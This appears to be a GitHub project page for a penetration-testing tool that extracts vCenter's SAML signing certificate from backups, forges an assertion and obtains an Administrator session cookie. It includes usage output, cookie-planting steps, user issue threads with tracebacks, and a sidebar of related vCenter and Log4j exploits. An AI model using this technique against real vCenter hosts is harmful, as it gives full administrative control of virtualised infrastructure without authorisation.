A tool to extract the IdP cert from vCenter backups and log in as Administrator

Overview

vCenter SAML Login Tool

A tool to extract the Identity Provider (IdP) cert from vCenter backups and log in as Administrator

Background

Commonly, during engagements, we will gain access to vCenter backups on a fileserver or gain root access to the VCSA host through recent CVEs. Logging into the vCenter vSphere UI allows us to easily gain access to more systems, confidential information, as well as show customers the impact of these findings.

The data.mdb file contains the certificates and can be found within vCenter backups as well as on the VCSA host with root permissions. These certificates are stored in cleartext and can be used to sign any SAML authentication request for any user - including the builtin Administrator.

If you'd like to know more about several use cases for this tool and how we've used it to gain Administrative access to vCenter hosts check out our blog post: https://www.horizon3.ai/compromising-vcenter-via-saml-certificates/

Usage

root@kali:~/vcenter# python3 vcenter_saml_login.py -p data.mdb -t 10.0.100.200
[*] Successfully extracted the IdP certificate
[*] Successfully extracted trusted certificate 1
[*] Successfully extracted trusted certificate 2
[*] Obtaining hostname from vCenter SSL certificate
[*] Found hostname vcsa.olympus for 10.0.100.200
[*] Initiating SAML request with 10.0.100.200
[*] Generating SAML assertion
[*] Signing the SAML assertion
[*] Attempting to log into vCenter with the signed SAML request
[+] Successfuly obtained Administrator cookie for 10.0.100.200!
[+] Cookie: VSPHERE-UI-JSESSIONID=06D1630719B4DE33A4CE653458911640

With the above cookie, visit the VCSA instance at https:// /ui, add the cookie under the /ui path, and re-browse to https:// /ui.

Demonstration

Disclaimer

This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.

Comments
  • Exception: expected 302 redirect

    Exception: expected 302 redirect

    Hello,

    I keep getting this error and have no clue why is that.

    [*] Successfully extracted the IdP certificate
    [*] CN: cn=TrustedCertChain-1,cn=TrustedCertificateChains,cn=<redacted>.local,cn=Tenants,cn=IdentityManager,cn=Services,dc=<redacted>,dc=local
    [*] Domain: <redacted>.local
    [*] Successfully extracted trusted certificate 1
    [*] Successfully extracted trusted certificate 2
    [*] Obtaining hostname from vCenter SSL certificate
    [*] Found hostname <redacted>.<redacted>.local for <redacted>
    [*] Initiating SAML request with <redacted>
    [-] Failed initiating SAML request with <redacted>
    Traceback (most recent call last):
      File "/home/morpheus/stuff/vcenter_saml_login/vcenter_saml_login.py", line 347, in <module>
        req = saml_request(args.target)
      File "/home/morpheus/stuff/vcenter_saml_login/vcenter_saml_login.py", line 241, in saml_request
        raise Exception("expected 302 redirect")
    Exception: expected 302 redirect
    

    I did check a little bit and if I understand correctly, the code expects to 302 redirect and gives exception when it doesn't. The thing is, the host is making 302 redirect but still, I'm getting this exception. Any help, suggestions will be priceless. Thanks.

    opened by Blackh4n 9
  •  An error occurred

    An error occurred

    Hello, I can't execute python. It may be caused by the certificate. I need help.

    python3 vcenter_saml_login.py -p data.mdb -t 172.31.0.10 [*] Successfully extracted the IdP certificate [-] Failed to find the trusted certificate 1 Traceback (most recent call last): File "vcenter_saml_login.py", line 295, in trusted_cert_1, domain = get_trusted_cert1(bin_stream, args.verbose) TypeError: cannot unpack non-iterable NoneType object

    opened by Hosrg 7
  • Failed logging in with SAML request.(expected 302 redirect)

    Failed logging in with SAML request.(expected 302 redirect)

    Any idea what could have gone wrong? Ver: VMware VirtualCenter 7.0.2 build-17920168 [-] Failed logging in with SAML request Traceback (most recent call last): File "/Users/vcenter_saml_login.py", line 351, in <module> c = login(args.target, s) File "/Users/vcenter_saml_login.py", line 301, in login raise Exception("expected 302 redirect") Exception: expected 302 redirect Response: [400] An error occurred while processing the authentication response from the vCenter Single Sign-On server. Details: HTTP error code: 403, status: BadResponse, sub status: Issuer not trusted: .

    opened by kingz40o 1
  • Add license

    Add license

    Hello, I would like to contribute to the code adding a more reliable validation for keys and certs, but there is no license in this repository. Please add some sort auf license to the repository. No license generally means you have no permission from the creators of the software to use, modify, or share the software. More info here https://choosealicense.com/no-permission/

    opened by bpg-it-raphaeljohn 1
  • Cookie not working

    Cookie not working

    Hello!

    The script reports Successfuly obtained Administrator cookie for .... but when I paste the value in the corresponding field the auth not working, just throws back to login screen. As I check its working with vcenter 6.x but not success in vcenter 7.0.3.

    Any idea? Thx!

    opened by Q1984 1
  • Fix 'get_domain_from_cn'

    Fix 'get_domain_from_cn'

    One should replace the 'lstrip' function call at 'get_domain_from_cn' with any alternative (e.g. 'removeprefix') since it strips extra characters (e.g. when the last domain part is 'dc=com').

    Thank you!

    opened by Resolk 1
  • [-] Failed signing the SAML assertion ('Could not deserialize key data')

    [-] Failed signing the SAML assertion ('Could not deserialize key data')

    Did anyone else have issues with "Failed signing the SAML assertion"?

    python3 vcenter_saml_login.py -p data.mdb -t <IP>  -v
    [*] Extracted IdP certificate:
    -----BEGIN PRIVATE KEY-----
    ...
    -----END PRIVATE KEY-----
    
    [*] Successfully extracted the IdP certificate
    [!] Looking for cert 1 at position: 69734592
    [!] CN end position: 69735640
    [*] CN: cn=TrustedCertChain-1,cn=TrustedCertificateChains,cn=<DOMAIN>.<DOMAIN>,cn=Tenants,cn=IdentityManager,cn=Seces,dc=<DOMAIN>,dc=<DOMAIN>
    [*] Domain: <DOMAIN>.<DOMAIN>
    [!] Cert 1 size: 999
    [*] Extracted Trusted certificate:
    -----BEGIN CERTIFICATE-----
    ...
    -----END CERTIFICATE-----
    
    [*] Successfully extracted trusted certificate 1
    Cert 2 Size: 1053
    [*] Extracted Trusted certificate:
    -----BEGIN CERTIFICATE-----
    ...
    -----END CERTIFICATE-----
    
    [*] Successfully extracted trusted certificate 2
    [*] Obtaining hostname from vCenter SSL certificate
    [*] Found hostname <FQDN> for <IP>
    [*] Initiating SAML request with <IP>
    [*] Generating SAML assertion
    [*] Signing the SAML assertion
    [-] Failed signing the SAML assertion
    Traceback (most recent call last):
      File "<PATH>/Log4jCenter/utils/vcenter_saml_login/vcenter_saml_login.py", line 349, in <module>
        s = sign_assertion(t, trusted_cert_1, trusted_cert_2, idp_cert)
      File "<PATH>/Log4jCenter/utils/vcenter_saml_login/vcenter_saml_login.py", line 281, in sign_assertion
        signed_assertion = signer.sign(root, reference_uri=assertion_id, key=key, cert=[cert1, cert2])
      File "/usr/local/lib/python3.9/dist-packages/signxml/__init__.py", line 398, in sign
        key = load_pem_private_key(ensure_bytes(key), password=passphrase, backend=default_backend())
      File "/usr/local/lib/python3.9/dist-packages/cryptography/hazmat/primitives/serialization/base.py", line 22, in d_pem_private_key
        return ossl.load_pem_private_key(data, password)
      File "/usr/local/lib/python3.9/dist-packages/cryptography/hazmat/backends/openssl/backend.py", line 823, in loadm_private_key
        return self._load_key(
      File "/usr/local/lib/python3.9/dist-packages/cryptography/hazmat/backends/openssl/backend.py", line 1070, in _lokey
        self._handle_key_loading_error()
      File "/usr/local/lib/python3.9/dist-packages/cryptography/hazmat/backends/openssl/backend.py", line 1129, in _hae_key_loading_error
        raise ValueError(
    ValueError: ('Could not deserialize key data. The data may be in an incorrect format, it may be encrypted with an upported algorithm, or it may be an unsupported key type (e.g. EC curves with explicit parameters).', [_OpenSSLErrithText(code=218529960, lib=13, reason=168, reason_text=b'error:0D0680A8:asn1 encoding routines:asn1_check_tlen:wr tag'), _OpenSSLErrorWithText(code=218546234, lib=13, reason=58, reason_text=b'error:0D06C03A:asn1 encoding routinasn1_d2i_ex_primitive:nested asn1 error'), _OpenSSLErrorWithText(code=218640442, lib=13, reason=58, reason_text=b'or:0D08303A:asn1 encoding routines:asn1_template_noexp_d2i:nested asn1 error'), _OpenSSLErrorWithText(code=1514987 lib=9, reason=13, reason_text=b'error:0907B00D:PEM routines:PEM_read_bio_PrivateKey:ASN1 lib')])
    
    

    I get the same error when trying to "check" the key with openssl:

     openssl rsa -in private.key -check    
       
    unable to load Private Key
    139866836145536:error:0D0680A8:asn1 encoding routines:asn1_check_tlen:wrong tag:../crypto/asn1/tasn_dec.c:1149:
    139866836145536:error:0D06C03A:asn1 encoding routines:asn1_d2i_ex_primitive:nested asn1 error:../crypto/asn1/tasn_dec.c:713:
    139866836145536:error:0D08303A:asn1 encoding routines:asn1_template_noexp_d2i:nested asn1 error:../crypto/asn1/tasn_dec.c:646:Field=version, Type=PKCS8_PRIV_KEY_INFO
    139866836145536:error:0907B00D:PEM routines:PEM_read_bio_PrivateKey:ASN1 lib:../crypto/pem/pem_pkey.c:88:
    
    opened by corsch 1
  • Add better validation of keys and certificates

    Add better validation of keys and certificates

    This should differentiate better between keys and certificates by adding a validation function for both. Probably fixes #6

    Thanks for adding the license.

    opened by bpg-it-raphaeljohn 0
  • An error is reported when the script is running

    An error is reported when the script is running

    root@kent:~/CVE-2021-22005-exp# python3 vcenter_saml_login.py -p data.mdb -t xxx.xx.xxx.xxx [] Successfully extracted the IdP certificate [] CN: cn=TrustedCertChain-1,cn=TrustedCertificateChains,CN=e4ed3720-803d-4d2e-bbd1-3b5221182357,CN=Ldus,CN=ComponentManager,DC=vsphere,DC=local [] Domain: vsphere.local [] Successfully extracted trusted certificate 1 [] Successfully extracted trusted certificate 2 [] Obtaining hostname from vCenter SSL certificate [] Found hostname vcenter.tech.zone for xxx.xx.xxx.xxx [] Initiating SAML request with xxx.xx.xxx.xxx [] Generating SAML assertion [] Signing the SAML assertion [*] Attempting to log into vCenter with the signed SAML request [-] Failed logging in with SAML request Traceback (most recent call last): File "/root/CVE-2021-22005-exp/vcenter_saml_login.py", line 350, in c = login(args.target, s) File "/root/CVE-2021-22005-exp/vcenter_saml_login.py", line 300, in login raise Exception("expected 302 redirect") Exception: expected 302 redirect

    xxx.xx.xxx.xxx Is an Internet IP

    opened by Chinakentgao 6
  • vCenter 7.0.3 Support

    vCenter 7.0.3 Support

    I was recently on an engagement and identified a vCenter 7.0.3 server. After troubleshooting this script I determined that this version requires a POST parameter RelayState for successful authentication. This change adds the RelayState parameter to add support for vCenter 7.0.3.

    This could break compatibility with older versions and should be tested.

    opened by Xerzzul 2
Owner
Horizon 3 AI Inc
AI-powered Pen Tests. See your enterprise through the eyes of an attacker & fix what matters.
Horizon 3 AI Inc
Exploiting CVE-2021-44228 in vCenter for remote code execution and more

Log4jCenter Exploiting CVE-2021-44228 in vCenter for remote code execution and more. Blog post detailing exploitation linked below: COMING SOON Why? P

null 81 Dec 20, 2022
Proof of Concept Exploit for vCenter CVE-2021-21972

CVE-2021-21972 Proof of Concept Exploit for vCenter CVE-2021-21972

Horizon 3 AI Inc 210 Dec 31, 2022
CVE-2021-21985 VMware vCenter Server远程代码执行漏洞 EXP (更新可回显EXP)

CVE-2021-21985 CVE-2021-21985 EXP 本文以及工具仅限技术分享,严禁用于非法用途,否则产生的一切后果自行承担。 0x01 利用Tomcat RMI RCE 1. VPS启动JNDI监听 1099 端口 rmi需要bypass高版本jdk java -jar JNDIIn

r0cky 355 Aug 3, 2022
the metasploit script(POC/EXP) about CVE-2021-22005 VMware vCenter Server contains an arbitrary file upload vulnerability

CVE-2021-22005-metasploit the metasploit script(POC/EXP) about CVE-2021-22005 VMware vCenter Server contains an arbitrary file upload vulnerability pr

Taroballz 25 Nov 15, 2022
VMware vCenter earlier v(7.0.2.00100) unauthorized arbitrary file read

vcenter_fileread_exploit VMware vCenter earlier v(7.0.2.00100) unauthorized arbitrary file read Usage python3 vCenter_fileread.py http(s)://ip Referen

Ashish Kunwar 4 Sep 23, 2022
orfipy is a tool written in python/cython to extract ORFs in an extremely and fast and flexible manner

Introduction orfipy is a tool written in python/cython to extract ORFs in an extremely and fast and flexible manner. Other popular ORF searching tools

Urminder Singh 34 Nov 21, 2022
This is python script that will extract the functions call in all used DLL in an executable and then provide a mapping of those functions to the attack classes defined and curated malapi.io.

F2Amapper This is python script that will extract the functions call in all used DLL in an executable and then provide a mapping of those functions to

Ajit Kumar 3 Sep 3, 2022
Python library to remotely extract credentials on a set of hosts.

Python library to remotely extract credentials on a set of hosts.

Pixis 1.5k Dec 31, 2022
A simple Burp Suite extension to extract datas from source code

DataExtractor A simple Burp Suite extension to extract datas from source code. Features in scope parsing file extensions to ignore files exclusion bas

Gwendal Le Coguic 86 Dec 31, 2022
A burp-suite plugin that extract all parameter names from in-scope requests

ParamsExtractor A burp-suite plugin that extract all parameters name from in-scope requests. You can run the plugin while you are working on the targe

null 29 Nov 9, 2022
A script to extract SNESticle from Fight Night Round 2

fn22snesticle.py A script for producing a SNESticle ISO from a Fight Night Round 2 ISO and any SNES ROM. Background Fight Night Round 2 is a boxing ga

Johannes Holmberg 57 Nov 22, 2022
All in One CRACKER911181's Tool. This Tool For Hacking and Pentesting. 🎭

All in One CRACKER911181's Tool. This Tool For Hacking and Pentesting. ??

Cracker 331 Jan 1, 2023
All in One CRACKER911181's Tool. This Tool For Hacking and Pentesting.🎭

This is A Python & Bash Programming Based Termux-Tool Created By CRACKER911181. This Tool Created For Hacking and Pentesting. If You Use This Tool To Evil Purpose,The Owner Will Never be Responsible For That.

CRACKER911181 1 Jan 10, 2022
Vulnerability Scanner & Auto Exploiter You can use this tool to check the security by finding the vulnerability in your website or you can use this tool to Get Shells

About create a target list or select one target, scans then exploits, done! Vulnnr is a Vulnerability Scanner & Auto Exploiter You can use this tool t

Nano 108 Dec 4, 2021
Facebook account cloning/hacking advanced tool + dictionary attack added | Facebook automation tool

loggef Facebook automation tool, Facebook account hacking and cloning advanced tool + dictionary attack added Warning Use this tool for educational pu

Md Josif Khan 149 Aug 10, 2022
labsecurity is a tool that brings together python scripts made for ethical hacking, in a single tool, through a console interface

labsecurity labsecurity is a tool that brings together python scripts made for ethical hacking, in a single tool, through a console interface. Warning

Dylan Meca 16 Dec 8, 2022
A tool to brute force a gmail account. Use this tool to crack multiple accounts

A tool to brute force a gmail account. Use this tool to crack multiple accounts. This tool is developed to crack multiple accounts

Saad 12 Dec 30, 2022
Osint-Tool - Information collection tool in python

Osint-Tool Herramienta para la recolección de información Pronto más opciones In

null 3 Apr 9, 2022
Dome - Subdomain Enumeration Tool. Fast and reliable python script that makes active and/or passive scan to obtain subdomains and search for open ports.

DOME - A subdomain enumeration tool Check the Spanish Version Dome is a fast and reliable python script that makes active and/or passive scan to obtai

Vadi 329 Jan 1, 2023